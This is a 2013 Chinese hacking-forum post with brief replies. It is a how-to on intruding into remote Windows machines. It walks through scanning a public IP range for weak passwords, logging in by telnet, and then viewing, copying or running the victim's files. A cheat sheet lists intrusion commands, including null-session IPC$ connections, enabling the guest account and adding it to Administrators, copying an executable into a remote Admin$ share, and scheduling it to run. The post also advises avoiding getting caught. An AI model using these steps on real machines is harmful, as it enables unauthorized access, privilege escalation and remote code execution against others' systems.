查看: 11956|回复: 4

系统漏洞入侵(上)【转】

[复制链接]
  • TA的每日心情
    奋斗
    2021-9-24 16:00
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2013-1-26 22:08:20 | 显示全部楼层 |阅读模式
    系统漏洞是指操作的编写存在一些缺陷或者是错误,而黑客就可以通过这个系统漏洞入侵计算机。
    今天来讲讲系统漏洞的利用。
    下载一个啊D网络工具包(这个是国内比较著名的扫描工具,功能齐全),然后记住要用外网,或者给内网做一个映射。
    首先先选择IP(我填写的是218.76.40.1至218.76.40.225),然后要填写端口了。

    在这里讲解一下端口普及知识
    第一种是公认端口:端口号为0——1023。这些通常是绑定着一些服务的。像80端口就分配给了WEB的访问(www服务),而21端口则是分配给了FTP的这些服务。
    第二种是注册端口:端口号为1024——49151。这里大家不要以为是注册账号的端口,这个完全是两码事。这种端口通常用于一些安装软件的服务,像QQ之类的软件。qq的端口我记得是4000.
    第三种是动态/私有端口:端口号为49152——65535。这里我很悟不透,因为从1024之后就属于动态/私有端口了,不知道为什么这里还要再分类,只知道它的一个例外是RPC是配对着32768。

    讲解完端口之后找到你要填写对方PC的端口号,但是这点你要注意,如果你要通过你填写的端口而连接对方的计算机,那么你也要开通自己的那个端口。
    端口的打开方法:http://wenku.baidu.com/view/614fc470a417866fb84a8e6d.html

    扫到了以后选择开始查找,这是在查找对方的账号和密码而获取若口令,像密码为123456789,这种密码就叫做弱口令,表示密码很简单。

    假设我找到了192.153.1.101这个ip的账号和密码,账号为admin,密码为123。找到了以后,打开CMD指令(什么是CMD指令这个就不用说了吧,要是不知道的上网查),输入“telnet 192.153.1.101”,然后按下回车键,输入账号和密码。入侵成功!!!

    接下来你就可以运用CMD指令对对方机子的文件进行查看,拷贝,或者添加及运行。比如输入“dir/w”,这个是查看C盘目录的指令。

    附:这里要说明一下,现在XP及WIN7的计算机很难用这个方法破解了,因为微软随时发布着补丁,用补丁把系统漏洞补上之后,那个漏洞也就无用了,但是2000的机子一扫一大堆都存在漏洞。还有就是大家入侵的时候要好好防御自己的电脑,防止被抓。另外,我们是红客,不是骇客,请勿对他人计算机进行破坏。

    在web上copy的一些命令:
    ==================================================================
                         一些常用的DOS网络命令  
    ==================================================================
    net share abc$=c:\                                 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录)
    net share c$ /del                                  禁止C$共享
    net use z: \\*.*.*.*\C$                            把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘
    net use c: /del                                    删除映射的c盘
    net use * /del /y                                  删除全部
    net start                                          显示本地主机当前服务
    net start telnet                                   启动 Telnet 服务  
    net start Server                                   启动 Server 服务 (IPC$ 和共享要靠这个服务)
    net stop Messenger                                 停止信使服务(不会在有烦人的Win的弹出广告了)!
    net stop  server                                   停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵)
    net user                                           得到本地主机的用户列表
    net user guest /active:yes                         将停用的guest帐号激活(变为可用)
    net user guest 888888                              把 Guest 帐号的密码改为 888888
    net localgroup Administrators guest /add           把 Guest 加到Administrators组中(这样你就有了超级权限了)
    net view \\*.*.*.*                                 查看指定IP主机上的共享
    nbtstat -A *.*.*.*                                 得到远程主机的NetBIOS用户名列表
    net share                                          查看本地主机的共享资源(本地的默认共享也可以看到)
    net use \\*.*.*.*\ipc$ "" /user:""                 建立空连接
    telnet *.*.*.* 90                                  连接对方机子的telnet,端口为90
    ipconfig                                           查看本机的IP信息
    入侵ipc过程序命令
    -----------------------------------------------
    net use \\*.*.*.*\ipc$ "" /user:"Administrator"    建立用户名为 Administrator 密码为空的连接
    copy server1.exe \\*.*.*.*\Admin$\system32         即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内
    net time \\*.*.*.*                                 查看远程主机的当前时间
    at \\*.*.*.* 14:00 server1.exe                     在对方机子添加一个在 14:00 运行 server1.exe 的任务
    netstat [-r] [-s] [-n] [-a]
    参数含义:
    -r 显示本机路由表的内容;
    -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议);
    -n 以数字表格形式显示地址和端口;
    -a 显示所有主机的端口号。

    评分

    参与人数 1i币 +4 收起 理由
    08-土豆 + 4 感谢分享

    查看全部评分

    回复

    使用道具 举报

    头像被屏蔽

    该用户从未签到

    发表于 2013-1-26 22:26:37 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-1-27 09:01:22 | 显示全部楼层
    好东西,谢谢LZ
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-1-27 11:42:13 | 显示全部楼层
      还不错、、、  、  感谢LZ  
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-1-31 17:07:22 | 显示全部楼层
    值得收藏
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-28 13:16 , Processed in 0.041719 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部